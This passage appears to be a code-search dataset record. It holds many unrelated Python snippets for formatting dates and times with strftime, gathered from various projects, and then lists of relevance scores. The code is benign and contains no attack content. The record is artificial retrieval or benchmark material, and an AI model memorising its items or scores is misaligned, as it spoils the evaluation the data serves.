For example,\r\n # the American English form is \"%b %d %Y\".\r\n # See http://strftime.org for details.\r\n actual_format = ugettext(\"SHORT_DATE_FORMAT\")\r\n if actual_format == \"SHORT_DATE_FORMAT\":\r\n actual_format = DEFAULT_SHORT_DATE_FORMAT\r\n if \"%x\" in actual_format:\r\n # Prevent infinite accidental recursion.\r\n actual_format = DEFAULT_SHORT_DATE_FORMAT\r\n part = strftime_localized(dtime, actual_format)\r\n elif code == \"%X\":\r\n # Get the localized time format, and recurse.\r\n # Translators: the translation for \"TIME_FORMAT\" must be a format\r\n # string for formatting times. For example, the American English\r\n # form is \"%H:%M:%S\". See http://strftime.org for details.\r\n actual_format = ugettext(\"TIME_FORMAT\")\r\n if actual_format == \"TIME_FORMAT\":\r\n actual_format = DEFAULT_TIME_FORMAT\r\n if \"%X\" in actual_format:\r\n # Prevent infinite accidental recursion.\r\n actual_format = DEFAULT_TIME_FORMAT\r\n part = strftime_localized(dtime, actual_format)\r\n else:\r\n # All the other format codes: just let built-in strftime take\r\n # care of them.\r\n part = dtime.strftime(code)\r\n\r\n return part\r\n\r\n formatted_date = re.sub(r\"%.|%\", process_percent_code, format)\r\n return formatted_date", "def strfdate(self, fmt):\n pattern = r'%({})'.format(reduce(lambda x, y: '{}|{}'.format(x, y), FORMAT_MAP.keys()))\n for f in re.findall(pattern, fmt):\n fmt = fmt.replace('%{}'.format(f), FORMAT_MAP[f](self))\n return fmt", "def strftime(self): # real signature unknown; restored from __doc__\r\n pass", "def strftime(self, fmt, roundofs=0): # pylint: disable=invalid-name\n _ = roundofs\n if not self._struct:\n yday = self._days - DayNum(self.year, 1, 1) + 1\n wday = _DayNumToWeekdayNum(self._days)\n self._struct = (self.year, self.month, self.day, 0, 0, 0, wday, yday, 0)\n return LocalStrftime(fmt, self._struct, '000000')", "def dt_strftime(self, date_format):\n return DateTimeDefault.register(pandas.Series.dt.strftime)(self, date_format)", "def to_format(self, format_string: str) -> str:\n return self.strftime(format_string)", "def get_template_formatted_date(date):\n return date.strftime(str(month(date.month)) + ' ' + str(date.day) + ', %Y')", "def dt_format_translate(pyfmt):\n\n translate = {\"%a\": \"ddd\",\n \"%A\": \"dddd\",\n \"%b\": \"mmm\",\n \"%B\": \"mmmm\",\n \"%c\": \"\",\n \"%d\": \"dd\",\n \"%f\": \"\",\n \"%H\": \"hh\",\n \"%I\": \"hh\",\n \"%j\": \"\",\n \"%m\": \"mm\",\n \"%M\": \"mm\",\n \"%p\": \"AM/PM\",\n \"%S\": \"ss\",\n \"%U\": \"\",\n \"%w\": \"\",\n \"%W\": \"\",\n \"%x\": \"\",\n \"%X\": \"\",\n \"%y\": \"yy\",\n \"%Y\": \"yyyy\",\n \"%z\": \"\",\n \"%Z\": \"\",\n \"%%\": \"%\"}\n\n xlfmt = str(pyfmt)\n\n for item in translate:\n if item in xlfmt:\n xlfmt = xlfmt.replace(item, translate[item])\n return xlfmt", "def strftime(self, *args, **kwargs):\r\n # This is the wrong place to import this function. I'm putting it here\r\n # because the xmodule test suite can't import this module, because\r\n # Django is not available in that suite. This function isn't called in\r\n # that suite, so this hides the import so the test won't fail.\r\n #\r\n # As I said, this is wrong. But Cale says this code will soon be\r\n # refactored to a place that will be right, and the code can be made\r\n # right there. 
If you are reading this comment after April 1, 2014,\r\n # then Cale was a liar.\r\n from util.date_utils import strftime_localized\r\n return strftime_localized(*args, **kwargs)", "def getFormattedDate(self, dt):\n if DATE_FORMAT_STRING == '':\n return time.strftime('%Y-%m-%d %H:%M:%S', dt.timetuple())\n else:\n return time.strftime(DATE_FORMAT_STRING, dt.timetuple())", "def formatDate(value):\n return time.strftime('%c',time.localtime(value))", "def usformat(date):\r\n return date.strftime('%m-%d-%Y %H:%M:%S')", "def dformat(val):\n if isinstance(val, datetime):\n return val.strftime(DATE_FORMAT)", "def date() -> str:\n\n return datetime.strftime(datetime.today(), _fmt)", "def date_format(date) -> str:\n if date is not None:\n str_ = date.strftime(DATE_FMT).upper()\n else:\n str_ = \" \"\n return str_", "def format_date(self, date):\n return time.strftime('%-I:%-M %p - %-d %b %Y',\n self.parse_twitter_date(date))", "def display_strptime_formatters():\n data = [\n [\"%a\", \"Weekday as locale's abbreviated name.\", \"Mon\"],\n [\"%A\", \"Weekday as locale's full name.\", \"Monday\"],\n [\"%w\", \"Weekday as a decimal number, where 0 is Sunday and 6 is Saturday.\", \"1\"],\n [\"%d\", \"Day of the month as a zero-padded decimal number.\", \"30\"],\n [\"%-d\", \"Day of the month as a decimal number. (Platform specific)\", \"30\"],\n [\"%b\", \"Month as locale's abbreviated name.\", \"Sep\"],\n [\"%B\", \"Month as locale's full name.\", \"September\"],\n [\"%m\", \"Month as a zero-padded decimal number.\", \"09\"],\n [\"%-m\", \"Month as a decimal number. (Platform specific)\", \"9\"],\n [\"%y\", \"Year without century as a zero-padded decimal number.\", \"13\"],\n [\"%Y\", \"Year with century as a decimal number.\", \"2013\"],\n [\"%H\", \"Hour (24-hour clock) as a zero-padded decimal number.\", \"07\"],\n [\"%-H\", \"Hour (24-hour clock) as a decimal number. (Platform specific)\", \"7\"],\n [\"%I\", \"Hour (12-hour clock) as a zero-padded decimal number.\", \"07\"],\n [\"%-I\", \"Hour (12-hour clock) as a decimal number. (Platform specific)\", \"7\"],\n [\"%p\", \"Locale's equivalent of either AM or PM.\", \"AM\"],\n [\"%M\", \"Minute as a zero-padded decimal number.\", \"06\"],\n [\"%-M\", \"Minute as a decimal number. (Platform specific)\", \"6\"],\n [\"%S\", \"Second as a zero-padded decimal number.\", \"05\"],\n [\"%-S\", \"Second as a decimal number. (Platform specific)\", \"5\"],\n [\"%f\", \"Microsecond as a decimal number, zero-padded on the left.\", \"000000\"],\n [\"%z\", \"UTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).\", \"\"],\n [\"%Z\", \"Time zone name (empty string if the object is naive).\", \"\"],\n [\"%j\", \"Day of the year as a zero-padded decimal number.\", \"273\"],\n [\"%-j\", \"Day of the year as a decimal number. (Platform specific)\", \"273\"],\n [\"%U\", \"Week number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.\", \"39\"],\n [\"%W\", \"Week number of the year (Monday as the first day of the week) as a decimal number. 
All days in a new year preceding the first Monday are considered to be in week 0.\", \"39\"],\n [\"%c\", \"Locale's appropriate date and time representation.\", \"Mon Sep 30 07:06:05 2013\"],\n [\"%x\", \"Locale's appropriate date representation.\", \"09/30/13\"],\n [\"%X\", \"Locale's appropriate time representation.\", \"07:06:05\"],\n [\"%%\", \"A literal '%' character.\", \"%\"]\n ]\n\n display(HTML(\n '<table><tr>{}</tr></table>'.format(\n '</tr><tr>'.join(\n '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in data)\n )\n ))", "def getdate():\n return strftime(\"%A %B %d, %I:%M %p\")", "def date_pattern():\n\n from datetime import datetime\n\n # Current time\n now = datetime.now()\n # Getting date\n date_val = now.strftime('%d_%b_%Y')\n # Getting hour:min:sec\n hour_val = now.strftime('%H%M%S')\n # Getting microsecond\n micro_val = now.strftime('%f')[:2]\n\n # Returns a str in described format\n return f'{date_val}_{hour_val}{micro_val}'", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def getTimeString():\n\tfrom time import strftime\n\treturn strftime(\"%d-%m-%Y__%H-%M-%S\")", "def gmdate(format, stamp = None):\n if stamp is None:\n stamp = time.time()\n dt = datetime.datetime.utcfromtimestamp(stamp)\n return dt.strftime(format)", "def strftime(self, fmt):\n # The year must be >= 1000 else Python's strftime implementation\n # can raise a bogus exception.\n timetuple = (1900, 1, 1, self._hour, self._minute, self._second, 0, 1, -1)\n return _wrap_strftime(self, fmt, timetuple)", "def date_string_to_strftime_format(date_string):\n for data in STRF_DATA:\n for pattern in data.get('patterns', []):\n if pattern in date_string:\n date_string = date_string.replace(pattern, data['replacement'])\n break\n else:\n if data.get('regex'):\n date_string = re.sub(data['regex'], data['replacement'], date_string)\n # matches = find()\n # if any(matches):\n # date_string = date_string.replace(matches[0], data['replacement'])\n\n return date_string", "def ingame_formatted(dt: datetime) -> str:\n return dt.strftime(\"%Y - %B\")", "def dtstr():\n return dt.strftime(dt.now(),'%Y %m %d, %H:%M:%S')", "def get_time_str():\n return time.strftime(time_fmt)", "def format_date(self, data):\n return '%s/%s' % (data.month, data.day)", "def l10n_format_date(ctx, date, format='long'):\n lang = get_locale(ctx['LANG'])\n if date:\n return format_date(date, locale=lang, format=format)\n else:\n return ''", "def reformat_date(mdy_date_string):\n date = mdy_date_string.split('/')\n return f\"{date[2]}-{date[0]}-{date[1]}\" # difficult to read", "def dateFormat(Epoch):\n import time, math\n timeTup = time.localtime(Epoch)\n if time.localtime().tm_year != timeTup.tm_year:\n return time.strftime('%b %d %Y ', timeTup)\n return time.strftime('%b %d %H:%S ', timeTup)", "def readable_date(self, date, format='%H:%M on %-d %B'):\n return date.strftime(format)", "def date2str(date, date_format):\n return date.strftime(date_format)", "def strftime(self, # pylint: disable=invalid-name\n fmt, roundofs=500, fixed_leap=None):\n struct_key = (roundofs, fixed_leap)\n struct = self._struct_dict.get(struct_key)\n if not struct:\n secofs, micros = divmod((self.nanosecond + roundofs) // 1000, 1000000)\n if fixed_leap is not None:\n raise 
ValueError('No fixed_leap on time-only object')\n if secofs:\n hour, minute, second = SecondsToHMS(self.seconds + secofs,\n leapok=False)\n struct0 = (0, 0, 0, hour % 24, minute, second, 0, 0, 0)\n else:\n struct0 = (0, 0, 0, self.hour, self.minute, self.second, 0, 0, 0)\n struct = (struct0, '%.06d' % micros)\n self._struct_dict[struct_key] = struct\n return LocalStrftime(fmt, struct[0], struct[1])", "def txfDate(date):\n return date.strftime('%m/%d/%Y')", "def date_format(date_str):\r\n return date_str.replace(\"/\", \"_\")", "def get_time_stamp_str() -> str:\n return datetime.datetime.now().strftime(DateFormat)", "def render_date(dt):\n return dt.strftime('%Y-%m-%d')", "def date2text(date=None):\n return date.strftime('%-d %B %Y')", "def date_format(context):\n return {'DATE_FORMAT': settings.DATE_FORMAT.replace('%', '')}", "def reformat_date(mdy_date_string):\n month, day, year = mdy_date_string.split('/')\n return f\"{year}-{month}-{day}\"", "def _strftime(cls, timestamp: typing.Optional[datetime.datetime]) -> typing.Optional[str]:\n if not timestamp:\n return None\n return timestamp.strftime(cls._TSFMT)", "def format_date(date):\n if type(date) is datetime.date:\n format_str = '%d.%m.%Y r.'\n else:\n format_str = '%H:%M %d.%m.%Y'\n\n date_str = '{:{fs}}'.format(date, fs=format_str)\n\n return date_str", "def do_date(dt, format='%Y-%m-%d - %A'):\n if dt is None:\n return ''\n # Only difference with do_datetime is the default format, but that is\n # convenient enough to warrant its own template filter.\n return dt.strftime(format)", "def get_datetime_string():\n return datetime.now().strftime(DATETIME_FORMAT)", "def displayText(self, value, locale):\n try:\n if QT_VERSION_STR[0] == '4':\n date = value.toPyObject() # QVariant ==> datetime\n elif QT_VERSION_STR[0] == '5':\n date = value\n return date.strftime(self.format)\n except:\n return \"\"", "def datetime_to_str(date, date_format=FORMAT_DATE):\n return date.strftime(date_format)", "def get_date(fmt=\"%Y-%m-%d\"):\n now = datetime.datetime.now().replace(tzinfo=IST)\n\n return now.strftime(fmt)", "def to_filetag(self) -> str:\n return self.strftime(f\"{self.FormatCode.YEAR.WITH_CENTURY}{self.FormatCode.MONTH.NUM}{self.FormatCode.DAY.NUM}\")", "def percent_update_date(self):\n d = self.percent_update_time.day\n return self.percent_update_time.strftime(\"%A %d{S}\").replace('{S}', str(d) + 'th' if 11 <= d <= 13 else {1:'st', 2:'nd', 3:'rd'}.get(d % 10, 'th'))", "def format_date(dt):\n # Looks like:\n # Sat, 07 Sep 2002 00:00:01 GMT\n # Can't use strftime because that's locale dependent\n #\n # Isn't there a standard way to do this for Python? The\n # rfc822 and email.Utils modules assume a timestamp. 
The\n # following is based on the rfc822 module.\n return \"%s, %02d %s %04d %02d:%02d:%02d GMT\" % (\n [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"][dt.weekday()],\n dt.day,\n [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\",\n \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"][dt.month-1],\n dt.year, dt.hour, dt.minute, dt.second)", "def test_strftimeEx_07():\n t = 7.9996\n fmt = \"%S %(ms_)\"\n result = strftimeEx(fmt, t)\n expected = \"07 999\"\n print 'result = \"%s\" expected = \"%s\"' % (result, expected)\n assert result == expected", "def shortDate(self, date):\n return u'%s %02i' % (date.pMonth(), date.day())", "def __str__(self):\n return '{y}-{m:0>2}-{d:0>2}'.format(y=self.year, m=self.month, d=self.day)", "def date_format(self):\n return self._date_format", "def get_date_display(self, context):\n return '{year}/{month}/{day}'.format(\n year=self.get_year(),\n month=self.get_month().zfill(2),\n day=self.get_day().zfill(2))", "def strftimeEx(fmt, t, timetuple=None):\n if callable(fmt):\n return fmt(t)\n\n if \"%(ms)\" in fmt:\n # Assume that fmt does not also contain %(ms_) and %(us).\n # (It really doesn't make sense to mix %(ms) with those.)\n secs, frac = divmod(round(t,3), 1)\n ms = int(round(1e3*frac))\n fmt = fmt.replace(\"%(ms)\", \"%03d\" % ms)\n else:\n # Assume fmt contains %(ms_) and %(us).\n secs, frac = divmod(round(t,6), 1)\n ms = int(round(1e3*frac))\n ms_, us = divmod(int(round(1e6*frac)),1000)\n fmt = fmt.replace(\"%(ms_)\", \"%03d\" % ms_)\n fmt = fmt.replace(\"%(us)\", \"%03d\" % us)\n\n if not timetuple:\n timetuple = localtime(secs)\n\n return strftime(fmt, timetuple)", "def strftime(self, format):\n x = _calcDependentSecond2(self._year, self._month, self._day,\n self._hour, self._minute, self._second)\n ltz = self._calcTimezoneName(x, 0)\n tzdiff = _tzoffset(ltz, self._t) - _tzoffset(self._tz, self._t)\n zself = self + tzdiff / 86400.0\n microseconds = int((zself._second - zself._nearsec) * 1000000)\n unicode_format = False\n if isinstance(format, explicit_unicode_type):\n format = format.encode('utf-8')\n unicode_format = True\n ds = datetime(zself._year, zself._month, zself._day, zself._hour,\n zself._minute, int(zself._nearsec),\n microseconds).strftime(format)\n if unicode_format:\n return ds.decode('utf-8')\n return ds", "def date(value: datetime.date): # noqa\n month_full_name = '%B'\n year_full = '%Y'\n\n is_unix_like = sys.platform in ('linux', 'linux2', 'darwin')\n day_without_leading_zero = '%-d' if is_unix_like else '%#d'\n hours_without_leading_zero = '%-I' if is_unix_like else '%#I'\n\n minutes_00_59 = '%M'\n am_or_pm = '%p'\n\n return have.value(\n value.strftime(\n f'{month_full_name} '\n f'{day_without_leading_zero}, '\n f'{year_full} '\n f'{hours_without_leading_zero}:'\n f'{minutes_00_59} '\n f'{am_or_pm}'\n )\n )", "def get_date_format_string(period):\n # handle the special case of 'month' which doesn't have\n # a static interval in seconds\n if isinstance(period, str) and period.lower() == 'month':\n return '%Y-%m'\n file_period_secs = get_period_seconds(period)\n format_pieces = ('%Y', '-%m-%d', ' %H', '-%M', '-%S')\n seconds_per_second = 1\n intervals = (\n seconds_per_year,\n seconds_per_day,\n seconds_per_hour,\n seconds_per_minute,\n seconds_per_second,\n )\n mods = list(map(lambda interval: file_period_secs % interval, intervals))\n format_pieces = format_pieces[: mods.index(0) + 1]\n return ''.join(format_pieces)", "def _format_date(self, date, humanize=True):\n if date:\n if humanize and date in 
self.special_dates:\n rv = self.special_dates[date]\n else:\n rv = date.strftime(self.date_format)\n return rv\n else:\n return ''", "def format_date(self, date):\n return date.strftime('%Y-%m-%d')", "def adjust_date_format(date, format_in, format_out):\n return datetime.strptime(date, format_in).strftime(format_out)", "def format_date(date, date_format_override=None):\n\n global date_format\n\n return datetime.datetime.strptime(date, '%Y-%m-%d').strftime(date_format_override or date_format)", "def today_string(fmt='%Y-%m-%d'):\n return brasilia_time().strftime(fmt)", "def time(self):\r\n now = datetime.datetime.now()\r\n month = rfc822._monthnames[now.month - 1].capitalize()\r\n return ('[%02d/%s/%04d:%02d:%02d:%02d]' %\r\n (now.day, month, now.year, now.hour, now.minute, now.second))", "def _reformat_to_readable_date(self, d: datetime.datetime) -> str:\n return re.fullmatch(\"(.*) \\d+:.*\", d.ctime()).group(1)", "def strftime(self, date_format: str) -> Index:\n return Index(self.to_series().dt.strftime(date_format))", "def get_date_to_display(self) -> str:\n if not self.settings.show_date_to:\n return \"\"\n return _date(\n self.date_to,\n \"DATETIME_FORMAT\" if self.settings.show_times else \"DATE_FORMAT\"\n )", "def get_date(self):\n return self.date.strftime(\"%a %x\")", "def get_date_display(self, context):\n return '{year}/{month}'.format(year=self.get_year(),\n month=self.get_month().zfill(2))", "def strftime(self, fmt=FMT_ISO8601, roundofs=500, fixed_leap=None):\n struct_key = (roundofs, fixed_leap)\n struct = self._struct_dict.get(struct_key)\n if not struct:\n strloc = self\n secofs, nanos = divmod(self.nanosecond + roundofs, 1000000000)\n if fixed_leap is not None:\n secofs += self.leapseconds - fixed_leap\n if secofs:\n days, secs = self.tai_day_secs()\n dayofs, secs = divmod(secs + secofs, SECONDS_PER_DAY)\n strloc = datetime.from_tai_day_secs(days + dayofs, secs, nanos)\n # pylint: disable=protected-access\n yday = strloc._days - DayNum(strloc.year, 1, 1) + 1\n wday = _DayNumToWeekdayNum(strloc._days)\n struct = ((strloc.year, strloc.month, strloc.day,\n strloc.hour, strloc.minute, strloc.second, wday, yday, 0),\n '%.06d' % (nanos // 1000))\n self._struct_dict[struct_key] = struct\n return LocalStrftime(fmt, struct[0], struct[1])", "def formatCurrTime(fmt=\"%H:%M:%S\"):\n assert fmt is not None, \"The format is None\"\n return strftime(fmt)", "def format_date(time=False):\n\n return arrow.get(time).format('DD-MM-YYYY')", "def date_string(date):\n day = date.day\n month = date.month\n year = date.year\n formatted_string = str(month) + \"/\"\n formatted_string += str(day) + \"/\"\n formatted_string += str(year)\n return formatted_string", "def timestamp(formatting=\"%Y%m%d_%H%M%S\"):\n now = datetime.now()\n return now.strftime(formatting)", "def get_date_from_display(self) -> str:\n return _date(\n self.date_from,\n \"DATETIME_FORMAT\" if self.settings.show_times else \"DATE_FORMAT\"\n )", "def period_str(month_tuple, fmt='%Y/%m'):\n return datetime.date(*month_tuple).strftime(fmt)", "def __format__(self, fmt):\n if not isinstance(fmt, str):\n raise TypeError(\"must be str, not %s\" % type(fmt).__name__)\n if len(fmt) != 0:\n return self.strftime(fmt)\n return str(self)", "def format_weekday_month_day(time):\n return (format_weekday(time) + \" \" + \n format_month_day(time))", "def friendly_date(self):\n return self.created_at.strftime(\"%a %b %#d %Y, %#I:%M %p\")", "def formatTime(self, record, datefmt=None):\n ct = self.converter(record.created)\n _format = datefmt or 
self.default_time_format\n\n s = ct.strftime(_format)\n\n return s", "def now():\n return datetime.now().strftime(FORMAT)", "def fCommon(self):\n return '%s %s, %4.4d %s:%2.2d %s' % (\n self._fmon, self._day, self._year, self._pmhour,\n self._minute, self._pm)", "def format_date(self, date_val):\n try:\n if type(date_val) is not datetime:\n d = date.fromisoformat(date_val[0:10])\n else:\n d = date_val\n return d.strftime('%Y-%m-%d')\n except Exception as e:\n self.error((str(e)))", "def pretty_date(self, date):\r\n return time.strftime(\"%a, %b %d, %Y\", time.strptime(date,\"%Y%m%d\"))", "def strftime_to_unicode(self, fmt):\r\n return re.sub(\r\n r'(%[a-zA-Z])',\r\n lambda m: self.STRFTIME_TO_UNICODE.get(m.group(1), m.group(1)),\r\n fmt\r\n )", "def format_message(self, message):\n return \"%s at %s\" % (\n message[0], time.asctime(time.localtime(message[1])))" ]
[ "0.76526", "0.76526", "0.76526", "0.7622349", "0.74858314", "0.7395106", "0.7327035", "0.7324193", "0.7300734", "0.71893567", "0.7129464", "0.7052781", "0.7028228", "0.7019862", "0.70110154", "0.693482", "0.692643", "0.683672", "0.6810442", "0.6744643", "0.67248136", "0.66804725", "0.66776884", "0.6652715", "0.6599797", "0.655845", "0.6514059", "0.6463454", "0.6462032", "0.6457314", "0.6451415", "0.6427054", "0.6410915", "0.6402916", "0.63635296", "0.6347897", "0.6347218", "0.634703", "0.63355833", "0.63185924", "0.6312423", "0.62894845", "0.626449", "0.62627035", "0.6256297", "0.6249736", "0.62350124", "0.6228438", "0.6187894", "0.6185798", "0.61786896", "0.61765194", "0.6155098", "0.6154655", "0.6154589", "0.6154357", "0.6141057", "0.6140959", "0.61234254", "0.6116804", "0.6085865", "0.60772455", "0.6071159", "0.6067415", "0.60633045", "0.6058273", "0.60388756", "0.6038718", "0.60337716", "0.6026521", "0.60211813", "0.6018606", "0.60177964", "0.6016741", "0.6006263", "0.5994856", "0.59924054", "0.59853315", "0.59802395", "0.597841", "0.5945185", "0.59317285", "0.59277886", "0.5923738", "0.5921928", "0.5921099", "0.5917943", "0.5916698", "0.5901901", "0.5898542", "0.587629", "0.5867214", "0.5866662", "0.5845109", "0.58283544", "0.5823532", "0.5821896", "0.58190733", "0.58114403", "0.5805651" ]
0.742588
5
This triggers MD to firePreferencesUpdated().... Hopefully refreshing Home Screen Views too
def fireMDPreferencesUpdated():
    myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()" )

    class FPSRunnable(Runnable):
        def __init__(self): pass

        def run(self):
            myPrint("DB",".. Inside FPSRunnable() - calling firePreferencesUpdated()...")
            myPrint("B","Triggering an update to the Summary/Home Page View")
            MD_REF.getPreferences().firePreferencesUpdated()

    if not SwingUtilities.isEventDispatchThread():
        myPrint("DB",".. Not running within the EDT so calling via FPSRunnable()...")
        SwingUtilities.invokeLater(FPSRunnable())
    else:
        myPrint("DB",".. Already running within the EDT so calling FPSRunnable() naked...")
        FPSRunnable().run()
    return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh_screen(self):", "def preferencesChanged(self):\n # do nothing\n pass", "def on_refresh(self):\n pass", "def updateSettingsUI(self):\n\n pass", "def applyPrefs (self):\r\n self.storyPanel.eachWidget(lambda w: w.applyPrefs())\r\n self.storyPanel.Refresh()", "def on_pre_enter(self):\n Logger.info('Application: Changed to the Settings screen.')", "def onPreferences():\n dialog = prefDialog()\n dialog.show()", "def onSettings(self):\n pass", "def preferencesChanged(self):\n self.__logViewer.preferencesChanged()", "def refresh(self) -> None:\n self.screen.refresh()", "def onUpdated(self):", "def Refresh(self):\n pass", "def refresh_view():\n pass", "def _on_pref_decls_updated(self, change):\n self._refresh_pref_decls()", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def _refresh_screen(self):\n self.myscreen.refresh()\n self.box1.refresh()\n self.box2.refresh()", "def refresh_plugin(self):\n pass", "def refresh(self):\n pass", "def refresh(self):\n pass", "def refresh(self, view_manager):\n pass", "def preferencesChanged(self):\n # reload the APIs\n self.apisManager.reloadAPIs()\n \n # reload editor settings\n for editor in self.editors:\n zoom = editor.getZoom()\n editor.readSettings()\n editor.zoomTo(zoom)\n \n # reload the autosave timer setting\n self.autosaveInterval = Preferences.getEditor(\"AutosaveInterval\")\n if len(self.editors):\n if (\n self.autosaveTimer.isActive() and\n self.autosaveInterval == 0\n ):\n self.autosaveTimer.stop()\n elif (\n not self.autosaveTimer.isActive() and\n self.autosaveInterval > 0\n ):\n self.autosaveTimer.start(self.autosaveInterval * 60000)\n \n self.__enableSpellingActions()", "def onPreferences():\n cpp.createWidgets()\n dialog = cpp.dialog()\n dialog.show()", "def on_settings(self):\n\n # Pull the current app state from the relay Observer object\n status, interval, ntfc_status, ntfc_state = settings_state.get_state()\n\n # Pass it to the Observable object in order to render the Settings window\n settings_changed, update_interval, ntfc_changed, ntfc_selected = render_settings_window(\n status, interval, ntfc_status, ntfc_state, settings_state)\n\n # Register any state changes\n settings_state.update_state(settings_changed, update_interval, ntfc_changed, ntfc_selected)\n\n # If the interval has changed, reprogram scheduler to run at the new interval\n if settings_state.intrvl_change_trig:\n modify_scheduler(JOB_ID, settings_state.settings_interval)\n\n if settings_state.notification_change_trig:\n NewsIndicator.notifications = False if not settings_state.notification_state else True", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def _refresh(self):\n # if we have all the values we need to hookup to the URL\n for key in self.DBMSettings.keys():\n if not key.startswith(LOCALCHAR):\n self.DBMSettings[key] = self._urldict()[key]", "def update_ui(self):\n # main data\n self.lAcc.setText(self.settings.ACCOUNT)\n # self.lExcessLiquidity.setText(str(self.ibkrworker.app.excessLiquidity))\n # self.lSma.setText(str(self.ibkrworker.app.sMa))\n if hasattr(self.ibkrworker.app, 'smaWithSafety'):\n self.lSma.setText(str(round(self.ibkrworker.app.smaWithSafety, 1)))\n else:\n self.lSma.setText(str(round(self.ibkrworker.app.sMa, 1)))\n self.lMarketValue.setText(str(self.ibkrworker.app.netLiquidation))\n self.lblAvailTrades.setText(str(self.ibkrworker.app.tradesRemaining))\n self.lcdPNL.display(self.ibkrworker.app.dailyPnl)\n if self.ibkrworker.app.dailyPnl > 
0:\n palette = self.lcdPNL.palette()\n palette.setColor(palette.WindowText, QtGui.QColor(51, 153, 51))\n self.lcdPNL.setPalette(palette)\n elif self.ibkrworker.app.dailyPnl < 0:\n palette = self.lcdPNL.palette()\n palette.setColor(palette.WindowText, QtGui.QColor(255, 0, 0))\n self.lcdPNL.setPalette(palette)\n\n total_positions_value = 0\n for p in self.ibkrworker.app.openPositions.values():\n if hasattr(p, 'Value'):\n total_positions_value += p[\"Value\"]\n self.lPositionsTotalValue.setText(str(round(total_positions_value, 1)))\n\n self.update_open_positions()\n self.update_live_candidates()\n self.update_open_orders()\n\n # everything disabled for safety - is now enabled\n self.chbxProcess.setEnabled(True)\n self.btnSettings.setEnabled(True)\n\n self.update_session_state()\n\n if not self.uiTimer.isActive():\n self.update_console(\"UI resumed.\")\n self.uiTimer.start(int(self.settings.INTERVALUI) * 1000) # reset the ui timer", "def _breakpoints_changed(self):\n if not self.view:\n return\n\n if self._ignore_signals:\n return\n\n self.view.refresh()", "def update_current_screen(self):\n\t\tself.current_screen.update()", "def on_window_ready(self):\n pass", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_load(self):", "def refresh(self) -> None:\n self.data = {}\n self.load_settings_file(self.default_settings_path / \"settings.yaml\", file_key=\"internal\")\n self.load_systems(self.default_settings_path / \"systems\")\n self.load_settings_file(self.personal_dir / \"settings.yaml\", file_key=\"user\")\n self.load_systems(self.personal_dir / \"systems\")", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def update_controller(self):", "def on_preference(self, widget, data=None):\n print \"This feature will be implemented soon\"", "def __configure(self):\n e5App().getObject(\"UserInterface\").showPreferences(\"logViewerPage\")", "def refresh(self):\n self.Refresh()", "def reload_state(self):\n if len(s.item) > 0:\n for item in s.item:\n self.items_list.insert(\n \"\", \"end\", values=(item.get(\"item\"), item.get(\"url\"), \" \")\n )\n # Update with saved settings\n # Update the refresh interval\n if s.setting != \"\":\n self.interval_entry.delete(0, \"end\")\n self.interval_entry.insert(0, s.setting)\n if s.LaunchAtStartup == \"True\":\n self.launch_at_start_up.select()\n else:\n self.launch_at_start_up.deselect()\n if s.Minimize == \"True\":\n self.minimize_to_system_tray.select()\n else:\n self.minimize_to_system_tray.deselect()\n # If the email alert is included in the state file\n if \"Email\" in s.alert:\n self.email_alert_box.select()\n # Display the email address\n emaddress = s.email\n self.email_addr_entry.insert(0, emaddress)", "def reload(self):", "def reload(self):", "def home_callback(self):\n self.rokucontrol.home_callback()", "def reloadMode(self): \n\t\tpass", "def __window_home(self):\n pass", "def refresh(self):\n\n self._refreshed_on = time.time() * 1000", "def refresh_view(self):\n # self.view_model.query_str = \"\"\n self.query_header.content.text = query_title_bar_text(self.shared_state)\n # self.view_model.update_results()\n self.layout.focus(self.query_window)", "def _Refresh(self):\n raise NotImplementedError", "def refresh(self):\n self.getWindow().getDecorView().postInvalidate()", "def update(self):\n self.mvp = self.computeMVP()\n self.onPropertyChanged()", "def _refresh(self):\n self._value = (self._service.get_value(self._entry_point, self._path)=='true')", "def 
_update_home_information(self, homes):\n\n if homes is not None and len(homes) > 0:\n self._home = homes[0]\n self.has_home = True\n self._update_horizon(max(abs(self._home[0]), abs(self._home[1])))\n if self.experimental_home is None:\n self.experimental_home = self._home\n else:\n if self.experimental_home not in self.last_scan['Home']:\n print self, self.experimental_home, \"is not in\", self.last_scan['Home']\n self.experimental_home = self._home\n else:\n self._home = self.experimental_home # Try some reckoning\n\n return", "def _update_callback(self) -> None:\n self.async_schedule_update_ha_state(force_refresh=True)", "def _update_callback(self) -> None:\n self.async_schedule_update_ha_state(force_refresh=True)", "def on_preferences(self, evt):\n # Passing `self` sets the main window as the parent window\n self.prefs.Show(self)\n evt.Skip()", "def preferences(self: Self, event: Event = None) -> None:\n c = self\n c.openLeoSettings()", "def refresh(self):\n self.__refresh()", "def on_startup(self) -> None:\n ...", "def update_presence(self):\n\t\tif self.config.presence_model == 'permanent':\n\t\t\tself.thin.presence = 'true'", "def beforeUpdate(self):", "def liveview(self):\n if self.liveviewButton.isChecked():\n# self.save = False\n self.paramChangedInitialize()\n self.openShutter(\"red\")\n self.liveviewStart()\n\n else:\n self.liveviewStop()", "def handle_reload_toolbox(self):", "def __load_value_prop_from_welcome(self):\n self.fc.reset_app()\n self.driver.wdvr.start_activity(self.pkg_name, LAUNCH_ACTIVITY.SMART)\n self.driver.wait_for_context(WEBVIEW_CONTEXT.SMART, 